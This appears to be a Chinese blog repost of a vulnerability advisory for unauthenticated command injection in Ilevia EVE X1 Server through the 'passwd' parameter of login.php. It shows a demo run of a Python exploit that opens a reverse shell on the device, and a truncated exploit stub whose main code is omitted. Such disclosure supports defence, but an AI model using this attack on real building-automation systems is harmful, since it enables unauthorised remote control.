Featured image of post Ilevia EVE X1服务器4.7.18.0.eden Neuro-Core未授权代码入侵漏洞利用

Ilevia EVE X1服务器4.7.18.0.eden Neuro-Core未授权代码入侵漏洞利用

本文详细分析了Ilevia EVE X1服务器4.7.18.0.eden版本中存在的未授权操作系统命令注入漏洞,通过/ajax/php/login.php脚本中的'passwd'参数可执行任意shell命令,包含完整的Python利用代码和演示过程。

Ilevia EVE X1服务器4.7.18.0.eden Neuro-Core未授权代码入侵漏洞利用

漏洞信息

  • 厂商: Ilevia Srl.
  • 产品页面: https://www.ilevia.com
  • 受影响版本: <= 4.7.18.0.eden (逻辑版本: 6.00)

产品概述

EVE是一款智能家居和楼宇自动化解决方案,适用于住宅和商业环境,包括商场、酒店、餐厅、酒吧、健身房、水疗中心、会议室和办公室。它通过高度可定制的用户友好界面实现对电气安装的全面控制和监控。

EVE是一个多协议平台,集成了智能建筑内的各种系统,以提升舒适度、安全性、保障和能源效率。用户可以通过iPhone、iPad、Android设备、Windows PC或Mac电脑管理建筑功能。

EVE X1服务器是专为高级楼宇自动化需求设计的硬件解决方案。紧凑而强大,非常适合公寓、中小型住宅和小型商业设施。它旨在可靠高效地管理整个自动化系统。

漏洞描述

EVE X1服务器存在未授权的操作系统命令注入漏洞。该漏洞可通过/ajax/php/login.php脚本中的’passwd’ HTTP POST参数注入并执行任意shell命令。

漏洞验证

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
$ python eve.py 10.0.0.17:8080 10.0.0.3 5555
[+] Cyber-link active on 0.0.0.0:5555...
[*] Firing at http://10.0.0.17:8080/ajax/php/login.php
[+] Pulse from 10.0.0.17:40040
[*] Probing matrix with 'pwd' signal...
[+] Verifistring: /home/ilevia/www-config/http/ajax/php
[*] Synaptic intrusion confirmed, escalating to holo-shell...
[+] Holo-shell online. 'exit' to disengage.
>> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
>> uname -a
Linux x1-eve 5.4.35-sunxi #trunk SMP Thu Apr 23 18:06:21 CEST 2020 armv7l GNU/Linux
>> exit

测试环境

  • GNU/Linux 5.4.35 (armv7l)
  • GNU/Linux 4.19.97 (armv7l)
  • Armbian 20.02.1 Buster
  • Apache/2.4.38 (Debian)
  • PHP Version 7.3.14

漏洞发现

由Gjoko ‘LiquidWorm’ Krstic (@zeroscience)发现

漏洞编号

利用代码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
#!/usr/bin/env python
#
# Ilevia EVE X1 Server 4.7.18.0.eden Neuro-Core Unauth Code Invasion
#
# [完整Python利用代码...]
import socket, telnetlib, threading, time, requests, sys

def init_quantum(target_data):
    if "http://" not in target_data and "https://" not in target_data:
        target_data = "http://" + target_data
    if ":" not in target_data.split("//")[1]:
        target_data = target_data.rstrip("/") + ":80"
    return target_data.rstrip("/")

[剩余利用代码...]

时间线

  • 发现日期: 2024年5月1日
  • 公布日期: 2025年7月31日
  • CVSS评分: 8.8
comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计